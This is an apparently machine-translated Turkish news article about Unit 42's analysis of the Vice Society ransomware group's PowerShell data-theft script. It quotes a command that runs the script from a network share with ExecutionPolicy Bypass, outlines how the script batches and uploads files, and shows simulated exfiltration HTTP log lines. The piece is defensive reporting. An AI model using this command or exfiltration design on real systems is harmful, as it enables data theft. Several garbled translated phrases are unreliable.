Palo Alto Networks Unit42’den araştırmacılar, özel olarak oluşturulmuş bir Microsoft Powershell betiğinin yardımıyla kurban ağından veri çalan fidye yazılımı çetesi “Vice Society”yi ortaya çıkardı.
Fidye yazılımı grupları, kurbanlardan veri çalmak için çok sayıda yöntem kullanır.
Bazı gruplar aşağıdaki gibi harici araçlar kullanırken FileZilla, WinSC, rclone vb Diğer gruplar kullanır BEBEKLER (arazi ikili dosyaları ve komut dosyalarıyla yaşamak) gibi yöntemler PowerShell betikleri, RDP kopyalama ve yapıştırma Ve Wininet.dll (Microsoft’un Win32 API’si).
Vice Society çetesinin kullandığı script ve yöntem aşağıda açıklanmıştır.
Saldırı Akışı
Çoğu tehdit aktörü, verileri çalmak için güvenlik yazılımı veya güvenlik personeli tarafından algılanacak harici bir araç getirme ihtiyacını ortadan kaldıran LOLBAS gibi yerleşik yöntemler kullanır.
Yerleşik yöntemler, ortamda çalıştıkları için bu güvenlik mekanizmalarından kaçınırlar.
Tehdit aktörleri, yerel bir Windows ortamında göz önünde saklanmak için PowerShell betiklerini kullanır.
2023’ün başlarında, Vice Society fidye yazılımı grubu, Olay Kimliği 4104: Komut Dosyası Blok Günlüğü olayıyla bir Windows Olay Günlüğünden (WEL) kurtarılan bir PS komut dosyası kullandı.
PS betiğinin, kurbanlardan veri çalmak için kullanılan w1.ps1 adı vardı. Bu Olay günlüğü, Microsoft-Windows-PowerShell/Operational WEL sağlayıcısının içinde bulunur.
Windows’taki kullanıcılar, komut dosyası bloğu olaylarını günlüğe kaydetmek için Komut Dosyası Blok Günlüğünü etkinleştirse de, Microsoft’un arka uçta hiçbir zaman belgelenmemiş kötü amaçlı bir olay kaydı olduğu görülüyor.
Ancak, Palo Alto’ya göre, bu Olay Kimliği 4104, kullanıcılar tarafından Komut Dosyası Blok Günlüğü etkinleştirilmediğinde bile kullanıcılar için yararlı olacaktır.
Palo Alto’daki Unit 42 araştırma ekibi, Vice Society komut dosyası tarafından kullanılan komut dosyası tarafından yürütülen bir komut buldu.
powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1
Ayrıca tehdit aktörü, bu betiği hedef makineye dağıtarak ağ içindeki hedef makinelerden yararlanır.
Genellikle tehdit aktörleri, her bir kurban makineyi tanımlamak için bu tür sabitleri daha belirli değerlerle ayarlar.
Bununla birlikte, Palo Alto’ya göre, bu dava bir test aşaması gibi görünüyor, ancak bunun sonsuza kadar böyle kalıp kalmayacağından tamamen emin değil.
Kötü Amaçlı PowerShell Komut Dosyası WorkFlow
İşlevler ve betikler arasındaki iş akışının tamamı aşağıdaki gösterimde görülebilir:
Komut Dosyası Başlatma
Komut dosyası, bildirilen işlevlerin çağrılmasından önce, Windows Yönetim Araçları’nın (WMI) yardımıyla hedef sistemdeki takılı sürücüleri kontrol eder. $drivers adlı bir dizi ile basit bir filtrelenmiş get-object win32_volume çağrısı yapılır. Bu dizi, hedef makineye monte edilmiş sürücülerin bir listesini içerir ve bunlar daha sonra tek tek bilgisayara iletilir. İş() işlev.
Komut dosyası aşağıdaki işlemleri yapacaktır:
- Hedef makineye takılı sürücülerin listesiyle dolu $drives adlı bir dizi oluşturur.
A. Win32_volume içindeki DriveType sıralaması, yerel diskleri ifade eder.
- Ana bilgisayardaki sürücü listesini yineler ($ sürücü) ve her sürücüyü şuraya geçirir: İş() işlev.
Tek sürücü takılı makinelerde aşağıdaki kod verilir.
İşlev – İş()
her seferinde İş() işlev çağrıldığında, sürücü yolu ($ disk) dizinleri aramak ve işlemek için alınır.
- Show() işlevi ile dizin adlarının bir listesi alındıktan sonra CreateJobLocal() işlevi çağrılır. Bu, bir grupta beş dizin adından oluşan bir listeyle gruplanmış her dizin için bir iş oluşturur.
- Komut dosyası bir seferde yalnızca 10 iş çalıştırır, bunun üzerinde handript 5 saniye uyur ve ardından çalışan işlerin sayısını yeniden kontrol eder. Bu tasarım, özellikle ana bilgisayarın kaynaklarının daha az kullanılması içindir. Bunun nedeni, kodun yazarına bağlı olsa da, metodoloji, tehdit aktörü ile harika bir kodlama uygulaması göstermektedir.
HTTP Etkinlik Örneği
Palo Alto’daki araştırma ekibi, isteğin nasıl alınacağını anlamak için tehdit aktörünün web sunucusunda HTTP POST isteğini de simüle etti.
192.168.42.100 – – [17/Feb/2023:02:46:00 -0000] “POST /upload?token=TEST_1&id=TEST&fullPath=%2fUsers%2fUnit42%2fDesktop%2fdont_exfil_me.eml HTTP/1.1” 200 166 “-” “-“
192.168.42.100 – – [17/Feb/2023:02:46:00 -0000] “POST /upload?token=TEST_1&id=TEST&fullPath=%2fUsers%2fUnit42%2fDesktop%2fi_mean_Please_dont_exfil_me.eml HTTP/1.1” 200 166 “-” “-“
192.168.42.100 – – [17/Feb/2023:02:46:00 -0000] “POST /upload?token=TEST_1&id=TEST&fullPath=%2fUsers%2fUnit42%2fDesktop%2fme_either.docx HTTP/1.1” 200 166 “-” “-“
Palo Alto’nun raporuna göre, HTTP etkinliği aşağıdaki bilgileri içeriyordu
- bu $tam yol komut dosyası sırasında bildirilen değişken, dosyanın yüklendiği sürücü harfini yok sayar.
- Web sunucusunda User-Agent dizisi yok.
Ayrıca, bir Ağ Güvenliği İzleme (NSM) veya İzinsiz Giriş Tespit Sisteminin (IDS) yürürlükte olduğunu varsayalım. Bu durumda, isteğin kaç baytının dışarı sızdırıldığına ilişkin bilgileri içerecek olan giden HTTP trafiği görülebilir.
Fidye yazılımı çetesi, birincil sistem kaynaklarının korunmasını sağlamak için çoklu işleme ve kuyruğa alma özelliklerine sahip, verilerin çalınması için basit bir komut dosyası kullanır. yazarken, listede yer alan dosya uzantılarıyla 10 KB’den büyük dosyalara odaklanır.
Palo Alto Networks’ün Unit 42 ekibi bu olayla ilgili eksiksiz bir rapor yayınladı.
Kötü Amaçlı Yazılımlara Karşı Savunma Stratejinizi Oluşturma – Ücretsiz E-Kitap İndirin
Ayrıca Oku:
Bilgisayar Korsanları Fidye Yazılım Saldırıları İçin Windows Zero-day’den Yararlandı
Yeni Money Message Fidye Yazılımı Hem Windows Hem de Linux Kullanıcılarına Saldırıyor
Uydu ve Uzay Endüstrisine Saldıran Fidye Yazılım Grupları
Kraliyet Fidye Yazılımı, Özel Yapım Şifreleme Kötü Amaçlı Yazılımını Kullanarak 11 Milyon ABD Dolarına Varan Kazandı